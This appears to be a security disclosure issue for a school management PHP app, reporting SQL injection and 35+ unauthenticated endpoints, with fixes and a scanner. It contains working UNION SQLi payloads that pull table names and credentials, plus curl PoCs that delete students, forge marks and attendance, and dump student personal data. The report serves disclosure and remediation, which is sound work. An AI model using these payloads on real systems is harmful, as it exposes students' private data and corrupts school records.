
[Security] Unauthenticated SQLi + 35 Unprotected API Endpoints (SMS-01 to SMS-03) #37

@abdurazzoqovjavohir700-dev

Description

Security Vulnerability Report

Reported by: Javohir Abdurazzoqov (independent security researcher)
Date: 2026-06-18


Critical: Unauthenticated SQL Injection + 35+ Unprotected API Endpoints

SMS-01: SQL Injection in buslocation.php (Critical, CVSS 9.8)

File: student_panel/buslocation.php line 54

<?php
include('../assets/config.php');
// NO session check!

$sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
$result = mysqli_query($conn, $sql);

PoC — Enumerate every table name via UNION (the first step toward dumping the whole database):

GET /student_panel/buslocation.php?bus_id=' UNION SELECT table_name,2,3 FROM information_schema.tables WHERE table_schema=database()-- -

PoC — Extract student credentials:

GET /student_panel/buslocation.php?bus_id=' UNION SELECT id,email,password_hash FROM users-- -
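To make the difference between the vulnerable query and the fix concrete, here is an added example (my code, not the project's) that rebuilds both in Python over an in-memory SQLite database. The schema and rows are constructed: bus_root is given three columns so that the three-column UNION in the PoC lines up, and users carries one fake credential row. SQLite has no information_schema, so the table-enumeration payload is retargeted at sqlite_master; the credential payload is the report's, unchanged. The same request value is fed to a string-built query and to a parameterised one, and only the string-built query leaks the other table.

```python
import sqlite3

# Constructed schema and data (assumption: bus_root has three columns so the
# report's three-column UNION lines up; these are not the project's real tables).
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE bus_root (bus_id TEXT, route TEXT, driver TEXT);
        INSERT INTO bus_root VALUES ('B1', 'Route 1', 'Driver 1');
        CREATE TABLE users (id INTEGER, email TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'alice@example.com', '$2y$10$constructed-hash');
        """
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, bus_id: str) -> list:
    """Mirrors buslocation.php: the request value is spliced into the SQL text,
    so a quote in it ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT * FROM bus_root WHERE bus_id='{bus_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, bus_id: str) -> list:
    """Mirrors the proposed fix: the value is bound as a parameter, so the
    whole payload is compared against bus_id as an ordinary string."""
    return conn.execute("SELECT * FROM bus_root WHERE bus_id=?", (bus_id,)).fetchall()


# The report's credential-extraction payload, unchanged.
CRED_PAYLOAD = "' UNION SELECT id,email,password_hash FROM users-- -"
# The report's table-enumeration payload, pointed at sqlite_master because
# SQLite has no information_schema.tables.
TABLE_PAYLOAD = "' UNION SELECT name,2,3 FROM sqlite_master WHERE type='table'-- -"


def enumerate_tables(conn: sqlite3.Connection) -> list:
    """Table names leaked through the injected UNION, sorted for stable output."""
    return sorted(row[0] for row in vulnerable_lookup(conn, TABLE_PAYLOAD))


if __name__ == "__main__":
    db = build_db()
    print("normal lookup     :", vulnerable_lookup(db, "B1"))
    print("tables leaked     :", enumerate_tables(db))
    print("creds leaked      :", vulnerable_lookup(db, CRED_PAYLOAD))
    print("same payload, safe:", safe_lookup(db, CRED_PAYLOAD))
```

The trailing `-- -` in both payloads turns the original closing quote into a comment, which is why the injected UNION parses cleanly in SQLite exactly as it does in MySQL.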

SMS-02: 35+ Unauthenticated AJAX Endpoints in assets/ (Critical, CVSS 9.1)

All 35+ files in assets/ include only config.php (DB connection) with no session check. Anyone can call these endpoints directly:

File Impact
removeStudent.php Delete any student (with transaction rollback support)
removeTeacher.php Delete any teacher
uploadMarks.php Insert/forge exam marks for any student
submitAttendence.php Forge attendance for any student/class
changeLeaveStatus.php Approve/reject any leave request
addStudent.php Add new students without login
addTeacher.php Add new teachers without login
editStudent.php Edit any student's personal data
editTeacher.php Edit any teacher's data
fetchStudentInfo.php Retrieve any student's PII (name, email, phone, address, guardian)
fetchStudents.php Dump all students in any class
fetchTeachers.php Dump all teachers

PoC — Delete student S1717xxxx:

curl -X POST https://TARGET/assets/removeStudent.php \
  -d "studentid=S1717xxxxx"
# Response: "success" — student deleted without any login

PoC — Forge attendance (all students absent):

curl -X POST https://TARGET/assets/submitAttendence.php \
  -H "Content-Type: application/json" \
  -d '[{"class":"10","section":"A","attendence":"absent"}]'

PoC — Upload fake exam marks:

curl -X POST https://TARGET/assets/uploadMarks.php \
  -H "Content-Type: application/json" \
  -d '{"S1234": {"examId": "E001", "marks": {"Math": "100", "Science": "100"}}}'

PoC — Get all student PII:

curl -X POST https://TARGET/assets/fetchStudents.php \
  -H "Content-Type: application/json" \
  -d '{"name":"","as":"10","a":"A"}'
# Returns: all student names, emails, phones, addresses, guardian info

SMS-03: SQL Injection in modal-teacher.php and modal-student.php (High, CVSS 8.6)

// owner_panel/modal-teacher.php line 98
$sql = "SELECT * FROM teachers where id = '{$_GET['id']}'";

// owner_panel/modal-student.php line 96  
$sql = "SELECT * FROM students where id = '{$_GET['id']}'";

Both are only reachable from within the authenticated owner panel, but they are still SQL injectable by any logged-in owner.
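SMS-02 and SMS-03 are two instances of patterns that can be found mechanically across a PHP tree: files that read request input or run queries without ever touching the session (SMS-02), and double-quoted SQL strings with a request superglobal interpolated into them, whether or not the file is behind a login (SMS-03). The following added example (my code, not the project's) is a small scanner for both patterns, run here over a constructed sample tree that imitates the layout the report describes; the file contents are illustrative and are not the project's real sources. Note the caveat the scanner cannot settle for you: the presence of a session check only proves some login is required, and a check on `$_SESSION['user_id']` alone would still let any logged-in student call removeStudent.php, so each endpoint also needs a role check that has to be reviewed by hand.

```python
import re
import tempfile
from pathlib import Path

# Files that take request input or touch the database should carry a session check.
HANDLES_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST)\b|php://input|mysqli_(?:query|prepare)\(")
HAS_SESSION_CHECK = re.compile(r"session_start\(|\$_SESSION")
# A double-quoted SQL string with a request superglobal spliced into it.
INTERPOLATED_SQL = re.compile(
    r'"[^"]*\b(?:SELECT|INSERT|UPDATE|DELETE)\b[^"]*\$_(?:GET|POST|REQUEST)\b'
)


def find_unguarded_endpoints(root) -> list:
    """PHP files under root that handle input or run queries but never check the session."""
    hits = []
    for path in Path(root).rglob("*.php"):
        src = path.read_text()
        if HANDLES_INPUT.search(src) and not HAS_SESSION_CHECK.search(src):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def find_interpolated_sql(root) -> list:
    """(file, line) pairs where a superglobal is interpolated straight into SQL text."""
    hits = []
    for path in Path(root).rglob("*.php"):
        for lineno, line in enumerate(path.read_text().splitlines(), 1):
            if INTERPOLATED_SQL.search(line):
                hits.append((path.relative_to(root).as_posix(), lineno))
    return sorted(hits)


# Constructed sample tree (assumption: illustrative contents, not the real sources).
SAMPLE_TREE = {
    "assets/config.php": """\
<?php
$conn = mysqli_connect('localhost', 'sms', 'secret', 'sms');
""",
    "assets/removeStudent.php": """\
<?php
include('config.php');
$stmt = mysqli_prepare($conn, "DELETE FROM students WHERE id = ?");
mysqli_stmt_bind_param($stmt, "s", $_POST['studentid']);
mysqli_stmt_execute($stmt);
echo "success";
""",
    "student_panel/buslocation.php": """\
<?php
include('../assets/config.php');
$sql = "SELECT * FROM bus_root WHERE bus_id='{$_GET['bus_id']}'";
$result = mysqli_query($conn, $sql);
""",
    "owner_panel/modal-student.php": """\
<?php
session_start();
if (!isset($_SESSION['user_id'])) { exit('Unauthorized'); }
include('../assets/config.php');
$sql = "SELECT * FROM students where id = '{$_GET['id']}'";
$result = mysqli_query($conn, $sql);
""",
    "owner_panel/students.php": """\
<?php
session_start();
if (!isset($_SESSION['user_id'])) { exit('Unauthorized'); }
include('../assets/config.php');
$stmt = mysqli_prepare($conn, "SELECT * FROM students WHERE class = ?");
mysqli_stmt_bind_param($stmt, "s", $_GET['class']);
""",
}


def build_sample_tree(root) -> None:
    for rel, src in SAMPLE_TREE.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(src)


def run_demo() -> dict:
    """Writes the sample tree to a temp dir and returns both scan results."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return {
            "unguarded": find_unguarded_endpoints(tmp),
            "interpolated_sql": find_interpolated_sql(tmp),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

On the sample tree the scanner flags removeStudent.php and buslocation.php as unguarded, and flags the interpolated SQL in both buslocation.php and modal-student.php even though the latter sits behind a session check, which is exactly the SMS-03 situation. config.php is not flagged because it only opens the connection. Pointed at the real repository (`find_unguarded_endpoints("path/to/repo")`), it gives a first list to review, not a final verdict.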


Fix

Add session validation to every assets/ file:

session_start();
if (!isset($_SESSION['user_id'])) {
    http_response_code(401);
    echo json_encode(["error" => "Unauthorized"]);
    exit();
}

Use prepared statements in buslocation.php (and likewise in modal-teacher.php and modal-student.php):

$stmt = mysqli_prepare($conn, "SELECT * FROM bus_root WHERE bus_id = ?");
mysqli_stmt_bind_param($stmt, "s", $_GET['bus_id']);
mysqli_stmt_execute($stmt);
// Replaces the $result previously obtained from mysqli_query()
$result = mysqli_stmt_get_result($stmt);

Reporter: Javohir Abdurazzoqov | abdurazzoqovjavohir700@gmail.com
